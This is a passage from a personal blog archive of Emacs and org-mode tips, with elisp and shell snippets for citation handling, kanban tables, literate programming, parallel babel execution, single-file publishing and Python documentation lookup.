  (if (not (eq last-command 'yank))
      (yank)
    (setq this-command 'yank)
    (unless arg (setq arg 1))
    (let ((inhibit-read-only t)
          (before (< (point) (mark t))))
      (if before
          (funcall (or yank-undo-function 'delete-region) (point) (mark t))
        (funcall (or yank-undo-function 'delete-region) (mark t) (point)))
      (setq yank-undo-function nil)
      (set-marker (mark-marker) (point) (current-buffer))
      (insert-for-yank (current-kill arg))
      ;; Set the window start back where it was in the yank command,
      ;; if possible.
      (set-window-start (selected-window) yank-window-start t)
      (if before
          ;; This is like exchange-point-and-mark, but doesn't activate the mark.
          ;; It is cleaner to avoid activation, even though the command
          ;; loop would deactivate the mark because we inserted text.
          (goto-char (prog1 (mark t)
                       (set-marker (mark-marker) (point) (current-buffer))))))
    nil))

3.25.5 Blink instead of beeping

(setq visible-bell t)

3.25.6 vc-state is slow

TODO: Adjust vc-find-file-hook to call the vcs tool asynchronously.

3.26 finish up

Make it possible to just (require 'babcore) and add the proper package footer.

(provide 'babcore)
;;; babcore.el ends here

4 Summary

With the babcore you have a core setup which exposes some of the essential features of Emacs and adds basic integration with the system which is missing in pristine Emacs.

Now run M-x package-list-packages to see where you can still go - or just use Emacs and add what you need along the way. The package list is your friend, as is Emacswiki.

Happy Hacking!

Note: As almost everything on this page, this text and code is available under the GPLv3 or later.

Conveniently convert CamelCase to words_with_underscores using a small emacs hack

I am currently coping with refactoring in an upstream project against which I maintain some changes that upstream does not merge. One nasty part is that the project converted its function names from CamelCase to words_with_underscores. And that created lots of merge conflicts.

Today I finally decided to speed up my work.

The first thing I needed was a function to convert a string in CamelCase to words_with_underscores. Since I’m lazy, I used google, and that turned up the CamelCase page of Emacswiki - and with it the following string functions:

(defun split-name (s)
  (split-string
   (let ((case-fold-search nil))
     (downcase
      (replace-regexp-in-string "\\([a-z]\\)\\([A-Z]\\)" "\\1 \\2" s)))
   "[^A-Za-z0-9]+"))
(defun underscore-string (s) (mapconcat 'downcase   (split-name s) "_"))

Quite handy - and elegantly executed. Now I just need to make this available for interactive use. For this, Emacs Lisp offers many useful ways to turn Editor information into program information, called interactive codes - in my case the region-code: "r". This gives the function the beginning and the end of the currently selected region as arguments.

With this, I created an interactive function which de-camelcases and underscores the selected region:

(defun underscore-region (begin end) (interactive "r")
  (let* ((word (buffer-substring begin end))
         (underscored (underscore-string word)))
    (save-excursion
      (widen) ; break out of the subregion so we can fix every usage of the function
      (replace-string word underscored nil (point-min) (point-max)))))

And now we’re almost there. Just create a macro which searches for a function, selects its name, de-camelcases and underscores it and then replaces every usage of the CamelCase name by the underscored name. This isn’t perfect refactoring (it can lead to errors), but it’s fast and I see every change it does.

C-x C-(
C-s def 
M-x mark-word
M-x underscore-region
C-x C-)

That’s it, now just call the macro repeatedly.

C-x eeeeee…

Now check the diff to fix the places where this 13-line hack got something wrong (like changing __init__ into _init_ - I won’t debug this, you’ve been warned ☺).

Happy Hacking!

Attachment: 2015-01-14-Mi-camel-case-to-underscore.org (2.39 KB)

Custom link completion for org-mode in 25 lines (emacs)

Update (2013-01-23): The new org-mode removed (org-make-link), so I replaced it with (concat) and uploaded a new example-file: org-custom-link-completion.el.
Happy Hacking!

1 Intro

I recently set up custom completion for two of my custom link types in Emacs org-mode. When I wrote about that on identi.ca, Greg Tucker-Kellog said that he’d like to see it, so I decided to publish my code.

The link types I regularly need are papers (PDFs of research papers I take notes about) and bib (the bibtex entries for the papers). The following are my custom link definitions:

(setq org-link-abbrev-alist
      '(("bib" . "~/Dokumente/Uni/Doktorarbeit-inverse-co2-ch4/aufschriebe/ref.bib::%s")
       ("notes" . "~/Dokumente/Uni/Doktorarbeit-inverse-co2-ch4/aufschriebe/papers.org::#%s")
       ("papers" . "~/Dokumente/Uni/Doktorarbeit-inverse-co2-ch4/aufschriebe/papers/%s.pdf")))

For some weeks I had copied the info into the links by hand. Thus an entry about a paper looks like the following.

* Title [[bib:identifier]] [[papers:name_without_suffix]]

This already suffices to be able to click the links for opening the PDF or showing the bibtex entry. Entering the links was quite inconvenient, though.

2 Implementation: papers

The trick to completion in org-mode is to create the function org-LINKTYPE-complete-link.

Let’s begin with the papers-links, because their completion is more basic than the completion of the bib-link.

First I created a helper function to replace all occurrences of a substring in a string1.

(defun string-replace (this withthat in)
  "Replace THIS with WITHTHAT in the string IN."
  (with-temp-buffer
    (insert in)
    (goto-char (point-min))
    (replace-string this withthat)
    (buffer-substring (point-min) (point-max))))

As you can see, it’s quite simple: Just create a temporary buffer and use the default replace-string function I’m using daily while editing. Don’t assume I figured out that elegant way myself. I just searched for it on the net and adapted the nicest code I found :)

Now we get to the real completion:

<<string-replace>>
(defun org-papers-complete-link (&optional arg)
  "Create a papers link using completion."
  (let (file link)
       (setq file (read-file-name "papers: " "papers/"))
       <<cleanup-link>>
    link))

The real magic is in read-file-name. That just uses the standard file completion with a custom prompt and starting directory.

cleanup-link is only a small list of setq’s which removes parts of the filepath to make it compatible with the syntax for paper-links:

(let ((pwd (file-name-as-directory (expand-file-name ".")))
  (pwd1 (file-name-as-directory (abbreviate-file-name
                 (expand-file-name ".")))))
  (setq file (string-replace "papers/" "" file))
  (setq file (string-replace pwd "" (string-replace pwd1 "" file)))
  (setq file (string-replace ".pdf" "" file))
  (setq link (concat "papers:" file)))

And that’s it. A few lines of simple elisp and I have working completion for a custom link-type which points to research papers - and can easily be adapted when I change the location of the papers.

Now don’t think I would have come up with all that elegant code myself. My favorite language is Python and I don’t think that I should have to know emacs lisp as well as Python. So I copied and adapted most of it from existing functions in emacs. Just use C-h f <function-name> and then follow the link to the code :)

Remember: This is free software. Reuse and learning from existing code is not just allowed but encouraged.

3 Implementation: bib

For the bib-links, I chose an even easier way. I just reused reftex-do-citation from reftex-mode:

<<reftex-setup>>
(defun org-bib-complete-link (&optional arg)
  "Create a bibtex link using reftex autocompletion."
  (concat "bib:" (reftex-do-citation nil t nil)))

For reftex-do-citation to allow using the bib-style link, I needed some setup, but I already had that in place for explicit citation inserting (not generalized as a link type), so I don’t count the following as part of the actual implementation. Also I likely copied most of it from the Emacs Wiki :)

(defun org-mode-reftex-setup ()
  (interactive)
  (and (buffer-file-name) (file-exists-p (buffer-file-name))
       (progn
        ; Reftex should use the org file as master file. See C-h v TeX-master for infos.
        (setq TeX-master t)
        (turn-on-reftex)
        ; don’t ask for the tex master on every start.
        (reftex-parse-all)
        ;add a custom reftex cite format to insert links
        (reftex-set-cite-format
         '((?b . "[[bib:%l][%l-bib]]")
           (?n . "[[notes:%l][%l-notes]]")
           (?p . "[[papers:%l][%l-paper]]")
           (?t . "%t")
           (?h . "** %t\n:PROPERTIES:\n:Custom_ID: %l\n:END:\n[[papers:%l][%l-paper]]")))))
  (define-key org-mode-map (kbd "C-c )") 'reftex-citation)
  (define-key org-mode-map (kbd "C-c (") 'org-mode-reftex-search))

(add-hook 'org-mode-hook 'org-mode-reftex-setup)

And that’s it. My custom link types now support useful completion.

4 Result

For papers, I get an interactive file-prompt to just select the file. It directly starts in the papers folder, so I can simply enter a few letters which appear in the paper filename and hit enter (thanks to ido-mode).

For bibtex entries, a reftex-window opens in a lower split-screen and asks me for some letters which appear somewhere in the bibtex entry. It then shows all fitting entries in brief but nice format and lets me select the entry to enter. I simply move with the arrow-keys, C-n/C-p, n/p or even C-s/C-r for searching, till the correct entry is highlighted. Then I hit enter to insert it.

./2012-06-15-emacs-link-completion-bib.png

And that’s it. I hope you liked my short excursion into the world of extending Emacs to stay focused while connecting separate data sets.

I never saw a level of (possible) integration and consistency anywhere else which even came close to the possibilities of emacs.

And by the way: This article was also written in org-mode, using its literate programming features for code-samples which can actually be executed and extracted at will.

To put it all together I just need the following:

<<org-papers-complete-link>>
<<org-bib-complete-link>>

Now I use M-x org-babel-tangle to write the code to the file org-custom-link-completion.el. I attached that file for easier reference: org-custom-link-completion.el :)

Have fun with Emacs!

PS: Should something be missing here, feel free to get it from my public .emacs.d. I only extracted what seemed important, but I did not check if it runs in a pristine Emacs. My at-home branch is “fluss”.

Footnotes:

1 : Creating a custom function for string replace might not have been necessary, because some function might already exist for that. But writing it myself was faster than searching for it.

Attachments:
2012-06-15-emacs-link-completion-bib.png (77.24 KB)
2012-06-15-Fr-org-link-completion.org (7.29 KB)
org-custom-link-completion.el (2.13 KB)

Easily converting ris-citations to bibtex with emacs and bibutils

The problem

Nature only gives me ris-formatted citations, but I use bibtex.

Also ris is far from human readable.

The background

ris can be reformatted to bibtex, but doing that manually disturbs my workflow when getting references while taking notes about a paper in emacs.

I tend to search online for references, often just using google scholar, so when I find a ris reference, the first data I get for the ris-citation is a link.

The solution

Making it possible

bibutils1 can convert ris to an intermediate xml format and then convert that to bibtex.

wget -O reference.ris RIS_URL
cat reference.ris | ris2xml | xml2bib >> ref.bib

This solves the problem, but it is not convenient, because I have to switch to the terminal, download the file, convert it and append the result to my bibtex file.

Making it convenient

With only the first step done, getting a ris citation is still quite inconvenient: I need three steps just to get a single citation.

But those steps are always the same, and since I use Emacs, I can automate and integrate them very easily. So I created a simple function in emacs, which takes the url of a ris citation, converts it to bibtex and appends the result to my local bibtex file. Now I get a ris citation with a simple call to

M-x ris-citation-to-bib

Then I enter the url and the function appends the citation to my bibtex file.2

Feel free to integrate it into your own emacs setup (additionally to the GPLv3 you can use any license used by emacswiki or worg).

(defun ris-citation-to-bib (&optional ris-url) 
  "get a ris citation as bibtex in one step. Just call M-x
ris-citation-to-bib and enter the ris url. 
Requires bibutils: http://sourceforge.net/p/bibutils/home/Bibutils/ 
"
  (interactive "Mris-url: ")
  (save-excursion
    (let ((bib-file "/home/arne/aufschriebe/ref.bib")
          (bib-buffer (get-buffer "ref.bib"))
          (ris-buffer (url-retrieve-synchronously ris-url)))
      ; firstoff check if we have the bib buffer. If yes, move point to the last line.
      (if (not (member bib-buffer (buffer-list)))
          (setq bib-buffer (find-file-noselect bib-file)))
      (progn 
        (set-buffer bib-buffer)
        (goto-char (point-max)))
      (if ris-buffer
          (set-buffer ris-buffer))
      (shell-command-on-region (point-min) (point-max) "ris2xml | xml2bib" ris-buffer)
      (let ((pmin (- (search-forward "@") 1))
            (pmax (search-forward "}\n\n")))
        (if (member bib-buffer (buffer-list))
            (progn
              (append-to-buffer bib-buffer pmin pmax)
              (kill-buffer ris-buffer)
              (set-buffer bib-buffer)
              (save-buffer)))))))

Happy Hacking!

PS: When I don’t have the URL (many thanks to journals giving me only a download button), I open the file, select the content and hit M-| (shell-command-on-region) with ris2xml | xml2bib (searching backwards via C-r ris so I avoid typing the exact command) and get the bibtex version in the results buffer.


  1. To get bibutils in Gentoo, just call emerge app-text/bibutils

  2. Well, actually I only use M-x ris- TAB, but that’s a detail (though I would not want to work without it :) ) 

El Kanban Org: parse org-mode todo-states to use org-tables as Kanban tables

Kanban for emacs org-mode.

Update (2020): Kanban moved to sourcehut: https://hg.sr.ht/~arnebab/kanban.el

Update (2013-04-13): Kanban.el now lives in its own repository: on bitbucket and on a statically served http-repo (to be independent from unfree software).

Update (2013-04-10): Thanks to Han Duply, kanban links now work for entries from other files. And I uploaded kanban.el on marmalade.

Some time ago I learned about kanban, and the obvious next step was: “I want to have a kanban board from org-mode”. I searched for it, but did not find any. Not wanting to give up on the idea, I implemented my own :)

The result are two functions: kanban-todo and kanban-zero.

“Screenshot” :)

TODO | DOING | DONE
Refactor in such a way that the
let Presentation manage dumb sprites
return all actions on every command:
Make the UiState adhere the list of
Turn the model into a pure state

kanban-todo

kanban-todo provides your TODO items as kanban-fields. You can move them in the table without having duplicates, so all the state maintenance is done in the kanban table. Once you are finished, you mark them as done and delete them from the table.

To set it up, put kanban.el somewhere in your load path and (require 'kanban) (more recent but potentially unstable version). Then just add a table like the following:

|   |   |   |
|---+---+---|
|   |   |   |
|   |   |   |
|   |   |   |
|   |   |   |
#+TBLFM: $1='(kanban-todo @# @2$2..@>$>)::@1='(kanban-headers $#)

Click C-c C-c with the point on the #+TBLFM line to update the table.

The important line is the #+TBLFM. That says “use my TODO items in the TODO column, except if they are in another column” and “add kanban headers for my TODO states”

The kanban-todo function takes an optional parameter match, which you can use to restrict the kanban table to given tags. The syntax is the same as for org-mode matchers. The third argument allows you to provide a scope, for example a list of files.

To only set the scope, use nil for the matcher.

See C-h f org-map-entries and C-h v org-agenda-files for details.
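
By analogy to the kanban-zero example further down, a kanban-todo line with matcher and scope might look like this (the tag and the file path are just placeholders):

#+TBLFM: $1='(kanban-todo @# @2$2..@>$> "1w6" '("~/org/plan.org"))::@1='(kanban-headers $#)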

kanban-zero

kanban-zero is a zero-state Kanban: All state is managed in org-mode and the table only displays the kanban items.

To set it up, put kanban.el somewhere in your load path and (require 'kanban). Then just add a table like the following:

|   |   |   |
|---+---+---|
|   |   |   |
|   |   |   |
|   |   |   |
|   |   |   |
#+TBLFM: @2$1..@>$>='(kanban-zero @# $#)::@1='(kanban-headers $#)

The important line is the #+TBLFM. That says “show my org items in the appropriate column” and “add kanban headers for my TODO states”.

Click C-c C-c with the point on the #+TBLFM line to update the table.

The kanban-zero function takes an optional parameter match, which you can use to restrict the kanban table to given tags. The syntax is the same as for org-mode matchers. The third argument allows you to provide a scope, for example a list of files.

To only set the scope, use nil for the matcher.

An example for matcher and scope would be:

#+TBLFM: @2$1..@>$>='(kanban-zero @# $# "1w6" '("/home/arne/.emacs.d/private/org/emacs-plan.org"))::@1='(kanban-headers $#)

See C-h f org-map-entries and C-h v org-agenda-files for details.

Contribute

To contribute to kanban.el, just change the file and write a comment about your changes. Maybe I’ll setup a repo on Bitbucket at some point…

Example

In the Hexbattle game-draft, I use kanban to track my progress:

Table of Contents

1 Kanban

STARTED
Refactor in such a way that the
let Presentation manage dumb sprites
return all actions on every command:
Make the UiState adhere the list of
Turn the model into a pure state

2 refactor Hexbattle    1w6

… and so on …

Advanced usage

“Graphical” TODO states

To make the todo states easier to grok directly you can use unicode symbols for them. Example:

#+SEQ_TODO: ❢ ☯ ⧖ | ☺ ✔ DEFERRED ✘
| ❢ | ☯ | ⧖ | ☺ |
|---+---+---+---|
|   |   |   |   |
#+TBLFM: @1='(kanban-headers $#)::@2$1..@>$>='(kanban-zero @# $#)

In my setup they are ❢ (todo), ☯ (doing), ⧖ (waiting) and ☺ (to report). Not shown in the kanban table are ✔ (finished), ✘ (dropped) and DEFERRED (later), because they don’t require any action from me, so I don’t need to see them all the time.

Collecting kanban entries via SSH

If you want to create a shared kanban table, you can use the excellent transparent network access options from Emacs tramp to collect kanban entries directly via SSH.

To use that, simply pass an explicit list of files to kanban-zero as 4th argument (if you don’t use tag matching just use nil as 3rd argument). "/ssh:host:path/to/file.org" retrieves the file ~/path/to/file.org from the host.

| ❢ | ☯ |
|---+---|
|   |   |
#+TBLFM: @1='(kanban-headers $#)::@2$1..@>$>='(kanban-zero @# $# nil (list (buffer-file-name) "/ssh:localhost:plan.org"))

Caveat: all included kanban files have to use at least some of the same todo states: kanban.el only retrieves TODO states which are used in the current buffer.

Attachment: kanban.el (5.86 KB)

How to show the abstract before the table of contents in org-mode

I use Emacs Org-Mode for writing all kinds of articles. The standard format for org-mode is to show the table of contents before all other content, but that requires people to scroll down to see whether the article is interesting for them. Therefore I want the abstract to be shown before the table of contents.

1 Intro

There is an old guide for showing the abstract before the TOC in org-mode<8, but since I use org-mode 8, that wasn’t applicable to me.

With a short C-h v org-toc TAB TAB (meaning: search all variables which start with org- and contain -toc) I found the following even simpler way. After I got that solution working, I found that this was still much too complex and that org-mode actually provides an even easier and very convenient way to add the TOC at any place.

2 Solution

(from the manual)

At the beginning of your file (after the title) add

#+OPTIONS: toc:nil

Then after the abstract add a TOC:

#+BEGIN_ABSTRACT
Abstract
#+END_ABSTRACT
#+TOC: headlines 2

Done. Have fun with org-mode!

3 Appendix: Complex way

This is the complicated way I tried first. It only works with LaTeX, but there it works. Better use the simple way.

Set org-export-with-toc to nil as file-local variable. This means you just append the following to the file:

# Local Variables:
# org-export-with-toc: nil
# End:

(another nice local variable is org-confirm-babel-evaluate: nil, but don’t set that globally, otherwise you could run untrusted code when you export org-mode files from others. When this is set file-local, emacs will ask you for each file you open whether you want to accept the variable setting)
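
Combining both file-local variables mentioned above, such a block would look like this (a sketch; only add org-confirm-babel-evaluate if you trust the code blocks in that file):

# Local Variables:
# org-export-with-toc: nil
# org-confirm-babel-evaluate: nil
# End: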

Then write the abstract before the first heading and add #+LATEX: \tableofcontents after it. Example:

#+BEGIN_ABSTRACT
Abstract
#+END_ABSTRACT
#+LATEX: \tableofcontents

Attachments:
2013-11-21-Do-emacs-orgmode-abstract-before-toc.pdf (143.29 KB)
2013-11-21-Do-emacs-orgmode-abstract-before-toc.org (2.23 KB)

IRC-chat via Tor with Emacs on Gentoo

As example: Connecting to #youbroketheinternet.

emerge privoxy torsocks net-vpn/tor
# rc-config start privoxy tor
# rc-update add privoxy default
# rc-update add tor default
mkdir -p ~/.local/EMACS_TOR_HOME/.emacs.d
echo "(require 'socks)" >> ~/.local/EMACS_TOR_HOME/.emacs.d/init.el
HOME=~/.local/EMACS_TOR_HOME torify emacs --title "Emacs-torified"
# M-x customize-variable RET socks-server RET
#   host: localhost
#   port: 9050
#   type: Socks v5
#   (C-x C-s to save and set)
# M-x erc-select
#   server loupsycedyglgamf.onion
#   port 67
# the welcome channel is good to go.
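
If you prefer setting the proxy in the init file of the torified HOME instead of going through customize, the equivalent setting would be (a sketch matching the host, port and type from the steps above):

(require 'socks)
; Socks v5 on localhost:9050, as configured above
(setq socks-server '("Default server" "localhost" 9050 5))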

See https://www.emacswiki.org/emacs/ErcProxy#toc2

and http://youbroketheinternet.org/#overlay

Insert a scaled screenshot in emacs org-mode

@marjoleink asked on identi.ca1 if it is possible to use emacs org-mode for showing scaled screenshots inline while writing. Since I thought I’d enjoy some hacking, I decided to take the challenge.

It does not do auto-scaling of embedded images, as far as I know, but the use case of screenshots can be done with a simple function (add this to your ~/.emacs or ~/.emacs.d/init.el):

(defun org-insert-scaled-screenshot ()
  "Insert a scaled screenshot 
for inline display 
into your org-mode buffer."
  (interactive)
  (let ((filename 
         (concat "screenshot-" 
                 (substring 
                  (shell-command-to-string 
                   "date +%Y%m%d%H%M%S")
                  0 -1 )
                 ".png")))
    (let ((scaledname 
           (concat filename "-width300.png")))
      (shell-command (concat "import -window root " filename))
      (shell-command (concat "convert -adaptive-resize 300 " filename " " scaledname))
      (insert (concat "[[./" scaledname "]]")))))

Now just call M-x org-redisplay-inline-images to see the screenshot (or add it to the function).
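
If you want the image to show up right away, a small wrapper can do both steps (a sketch; the wrapper name is made up here):

; a sketch: insert the scaled screenshot and refresh inline images right away
(defun my-org-insert-scaled-screenshot-and-show ()
  (interactive)
  (org-insert-scaled-screenshot)
  (org-redisplay-inline-images))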

In action:

scaled screenshot

Have fun with Emacs - and happy hacking!

PS: In case it’s not obvious: The screenshot shows emacs just as the screenshot is being shot - with the method shown here ☺


  1. Matthew Gregg: @marjoleink "way of life" thing again, but if you can invest some time, org-mode is a really powerful note keeping environment. → Marjolein Katsma: @mcg I'm sure it is - but seriously: can you embed a diagram2 or screenshot, scale it, and link it to itself? 

  2. For diagrams, you can just insert a link to the image file without description, then org-mode can show it inline. To get an even nicer user-experience (plain text diagrams or ascii-art), you can use inline code via org-babel using graphviz (dot) or ditaa - the latter is used for the diagrams in my complete Mercurial branching strategy

Attachments:
screenshot-20121122101933-width300.png (108.08 KB)
screenshot-20121122101933-width600.png (272.2 KB)

Minimal example for literate programming with noweb in emacs org-mode

If you want to use the literate programming features in emacs org-mode, you can try this minimal example to get started: Activate org-babel-tangle, then put this into the file noweb-test.org:

Minimal example for noweb in org-mode

* Assign 

First we assign abc:

#+begin_src python :noweb-ref assign_abc
abc = "abc"
#+end_src

* Use

Then we use it in a function:

#+begin_src python :noweb tangle :tangle noweb-test.py
def x():
  <<assign_abc>>
  return abc

print(x())
#+end_src

noweb-test.org

Hit C-c C-c to evaluate the source block. Hit C-c C-v C-t to put the expanded code into the file noweb-test.py.

The exported code looks like this:

def x():
  abc = "abc"
  return abc
print(x())

noweb-test.py

(html generated with org-export-as-html-to-buffer and slightly reniced to escape the additional parsing I have on my site)

And with org-export-as-pdf we get this:

org-mode-noweb-example

noweb-test.pdf

Add :results output to the #+begin_src line of the second block to see the print results under that block when you hit C-c C-c in the block.
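
With that, the header line of the second block would read like this (simply the header from above plus :results output):

#+begin_src python :noweb tangle :tangle noweb-test.py :results output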

You can also use properties of headlines for giving the noweb-ref. Org-mode can then even concatenate several source blocks into one noweb reference. Just hit C-c C-x p to set a property (or use M-x org-set-property), then set noweb-ref to the name you want to use to embed all blocks under this heading together.
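
For example, the first block from the minimal example could get its noweb-ref from a headline property instead (a sketch following the description above):

* Assign
  :PROPERTIES:
  :noweb-ref: assign_abc
  :END:

#+begin_src python
abc = "abc"
#+end_src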

Note: org-babel prefixes each line of an included code-block with the prefix used for the reference (here <<assign_abc>>). This way you can easily include blocks inside python functions.

Note: To keep noweb-references literally in the output or similar, have a look at the different options to :noweb.

Note: To do this with shell-code, it’s useful to change the noweb markers to {{{ and }}}, because << and >> are valid shell-syntax, so they disturb the highlighting in sh-mode. Also confirming the evaluation every time makes plain exporting problematic. To fix this, just add the following somewhere in the file (to keep this simple, just add it to the end):

# Local Variables:
# org-babel-noweb-wrap-start: "{{{"
# org-babel-noweb-wrap-end: "}}}"
# org-confirm-babel-evaluate: nil
# org-export-allow-bind-keywords: t
# End:
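
If you prefer setting these markers globally instead of per file, the corresponding settings for your .emacs would be (a sketch using the same variables):

; global equivalent of the file-local noweb marker settings above
(setq org-babel-noweb-wrap-start "{{{"
      org-babel-noweb-wrap-end "}}}")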

Have fun with Emacs and org-mode!

Attachments:
noweb-test.pdf (81.69 KB)
noweb-test.org (290 Bytes)
noweb-test.py.txt (49 Bytes)
noweb-test-pdf.png (6.05 KB)

Org-mode with Parallel Babel

Update 2017: a block with sem -j ... seems to block in recent versions of Emacs until all subtasks are done. It would be great if someone could figure out why (though it likely is the right thing to do). To circumvent that, you can daemonize the job in sem, but that might have unwanted side-effects: sem "[job] &"

Babel in Org

Emacs Org-mode provides the wonderful babel-capability: Including code-blocks in any language directly in org-mode documents in plain text.

In default usage, running such code freezes my emacs until the code is finished, though.

Up to a few weeks ago, I solved this with a custom function, which spawns a new emacs as script runner for the specific code:

; Execute babel source blocks asynchronously by just opening a new emacs.
(defun bab/org-babel-execute-src-block-new-emacs ()
  "Execute the current source block in a separate emacs,
so we do not block the current emacs."
  (interactive)
  (let ((line (line-number-at-pos))
        (file (buffer-file-name)))
    (async-shell-command (concat 
                          "TERM=vt200 emacs -nw --find-file " 
                          file 
                          " --eval '(goto-line "
                          (number-to-string line) 
                          ")' --eval "
     "'(let ((org-confirm-babel-evaluate nil))(org-babel-execute-src-block t))' "
                          "--eval '(kill-emacs 0)'"))))

and its companion for exporting to beamer-latex presentation pdf:

; Export as pdf asynchronously by just opening a new emacs.
(defun bab/org-beamer-export-new-emacs ()
  "Export the current file in a separate emacs,
so we do not block the current emacs."
  (interactive)
  (let ((line (line-number-at-pos))
        (file (buffer-file-name)))
    (async-shell-command (concat 
                          "TERM=vt200 emacs -nw --find-file " 
                          file 
                          " --eval '(goto-line " 
                          (number-to-string line) 
                          ")' --eval "
     "'(let ((org-confirm-babel-evaluate nil))(org-beamer-export-to-pdf))' "
                          "--eval '(kill-emacs 0)'"))))

But for shell-scripts there’s a much simpler alternative:

GNU Parallel to the rescue! Process-pool made easy.

Instead of spawning an external process, I can just use GNU Parallel for the long-running program-calls in the shell-code. For example like this (real code-block):

#+BEGIN_SRC sh :exports none
  oldPWD=$(pwd)
  cd ~/tm5tools/plotting
  filename="./obsheat-increasing.png" >/dev/null 2>/dev/null
  sem -j -1 ./plotstation.py -c ~/sun-work/ct-production-out-5x7e300m1.0 -C "aircraft" -c ~/sun-work/ct-production-out-5x7e300m1.0no-aircraft -C "continuous"  --obsheat --station allnoaa --title "\"Reducing observation coverage\"" -o ${oldPWD}/${filename}
  cd -
#+END_SRC

Let me explain this.

sem is a part of GNU parallel which makes parallel execution easy. Essentially it gives us a simple version of the convenience we know from make.

for i in {1..100}; do 
    sem -j -1 [code] # run N-1 processes with N as the number of
                     # processors in my computer
done

This means that the above org-mode block will finish instantly, but there will be a second process managed by GNU parallel which executes the plotting script.

The big advantage here is that I can also set this to execute on exporting a document which might run hundreds of code-blocks. If I did this with naive multiprocessing, that would spawn 100 processes which overwhelm the memory of my system (yes, I did that…).

sem -j -1 ensures that this does not happen. Essentially it provides a process-pool with which it executes the code.

If you use this on export, take care to add a final code-block which waits until all other blocks have finished:

sem --wait
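
Wrapped as an org-mode block that runs on export, this could look like the following sketch (mirroring the header of the block above):

#+BEGIN_SRC sh :exports none
  sem --wait
#+END_SRC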

A word of caution: Shell escapes

If you use GNU parallel to run programs, the arguments are interpreted two times: once when you pass them to sem and a second time when sem passes them on. Due to this, you have to add escaped quote-marks for every string which contains whitespace. This can look like the following code (the example above reduced to its essential parts):

sem -j -1 ./plotstation.py --title "\"Reducing observation coverage\""

I stumbled over this a few times, but the convenience of GNU parallel is worth the small extra-caution.

Besides: For easier editing of inline-source-code, set org-src-fontify-natively to true (t), either via M-x customize-variable or by adding the following to your .emacs:

(setq org-src-fontify-natively t)

Summary

With the tool sem from GNU parallel you get parallel execution of shell code-blocks in emacs org-mode using the familiar syntax from make:

sem -j -1 [escaped code]

Publish a single file with emacs org-mode

I often write small articles on some experience I made, and since I want to move towards using static pages more often, I tried using emacs org-mode publishing for that. Strangely the simple use case of publishing a single file seems quite a bit more complex than needed, so I document the steps here.

This is my first use of org-publish, so I likely do not use it perfectly. But as it stands, it works. You can find the org-publish version of this article at draketo.de/proj/orgmode-single-file.

1 Why static pages?

I recently lost a dynamic page to hackers. I could not recover the content from all the spam which flooded it. It was called good news and I had wanted to gather positive news which encourage getting active - but I never really found the time to get it running. See what is left of it: http://gute-neuigkeiten.de

Any dynamic page carries a big maintenance cost, because I have to update all the time to keep it safe from spammers who want to abuse it for commercial spam - in the least horrible case. I can choose a managed solution, but that makes me dependent on the hoster providing what I need. Or I can take the sledgehammer and just use a static site: It never does any writes to the webserver, so there is nothing to hack.

As you can see, that’s what I’m doing nowadays.

2 Why Emacs Org-Mode?

Because after having used MacOS for almost a decade and then various visual-oriented programs for another five years, Emacs is nowadays the program which is most convenient to me. It achieves a level of integration and usability which is still science-fiction in other systems - at least when you’re mostly working with text.

And Org-mode is to Emacs as Emacs is to the Operating System: It begins as a simple todo-list and accompanies you all the way towards programming, reproducible research - and publishing websites.

3 Current Solution

Currently I first publish the single file to FTP and then rename it to index.html. This translates to the following publish settings:

(setq private-publish-ftp-proj (concat "/ftp:" USER "@" HOST ":arnebab/proj/"))

(setq org-publish-project-alist
      `(("orgmode-single-file"
         :base-directory "~/.emacs.d/private/journal"
         :publishing-directory ,(concat private-publish-ftp-proj "orgmode-single-file/")
         :base-extension "org"
         :publishing-function org-html-publish-to-html
         :completion-function (lambda () (rename-file 
                                          (concat private-publish-ftp-proj 
                                                  "orgmode-single-file/2013-11-25-Mo-publish-single-file-org-mode.html") 
                                          (concat private-publish-ftp-proj 
                                                  "orgmode-single-file/index.html") t))
         :section-numbers nil
         :with-toc t
         :html-preamble t
         :exclude ".*"
         :include ["2013-11-25-Mo-publish-single-file-org-mode.org"])))

Now I can use C-c C-e P x orgmode-single-file to publish this file to the webserver whenever I change it.

Note the lambda: I just rename the published file to index.html, because I did not find out how to rename the file by just setting an option. :index-filename did not work. But likely I missed something which would make this much nicer.

Note that if I had wanted to publish a folder full of files, this would have been much easier: There actually is an option to create an automatic index-file and sitemap.

For more details, read the org-mode publishing guide.

4 Conclusion

This is not as simple as I would like it to be. Maybe (or rather: likely) there is a simpler way. But I can now publish arbitrary org-mode files to my webserver without much effort (and without having to switch context to some other program). And that’s something I’ve been missing for a long time, so I’m very happy to finally have it.

And it was less pain than I feared, though publishing this via my drupal-site, too, obviously shows that I’m still far from moving to static pages for everything. For work-in-progress, this is great, though - for example for my Basics for Guile Scheme.

Read your python module documentation from emacs

Update 2021: Fixed links that died with Bitbuckets hosting.

I just found the excellent pydoc-info mode for emacs from Jon Waltman. It allows me to hit C-h S in a python file and enter a module name to see the documentation right away. If the point is on a symbol (=module or class or function), I can just hit enter to see its docs.

pydoc in action

In its default configuration (see the Readme) it “only” reads the python documentation. This alone is really cool when writing new python code, but it is not enough, since I often use third party modules.

And now comes the treat: If those modules use sphinx for documentation (≥1.1), I can integrate them just like the standard python documentation!

It took me some time to get it right, but now I have all the documentation for the inverse modelling framework I contribute to directly at my fingertips: Just hit C-h S ENTER when I’m on some symbol and a window shows me the docs:

custom pydoc in action
The text in this image is from Wouter Peters. Used here as short citation which should be legal almost everywhere under citation rules.

I want to save you the work of figuring out how to do that yourself, so here’s a short guide for integrating the documentation for your python program into emacs.

Integrating your own documentation into emacs

The prerequisite for integrating your own documentation is to use sphinx for documenting your code. See their tutorial for info how to set it up. As soon as sphinx works for you, follow this guide to integrate your docs in your emacs.

Install pydoc-info

First get pydoc-info and the python infofile (adapt this to your local setup):

# get the mode
cd ~/.emacs.d/libs
hg clone https://hg.sr.ht/~arnebab/pydoc-info
# and the pregenerated info-file for python
wget http://www.draketo.de/dateien/python.info.gz
gunzip python.info.gz
sudo cp python.info /usr/share/info
sudo install-info --info-dir=/usr/share/info python.info

To build the info file for python yourself, have a look at the Readme.

Turn your documentation into info

Now turn your own documentation into an info document and install it.

Sphinx uses a core configuration file named conf.py. Add the following to that file, replacing all values but index and False by the appropriate names for your project:

# One entry per manual page. 
# list of tuples (startdocname, 
# targetname, title, author, dir_entry, 
# description, category, toctree_only).
texinfo_documents = [
  ('index', # startdocname, keep this!
   'TARGETNAME', # targetname
   u'Long Title', # title
   u'Author Name', # author
   'Name in the Directory Index of Info', # dir_entry
   u'Long Description', # description
   'Software Development', # category
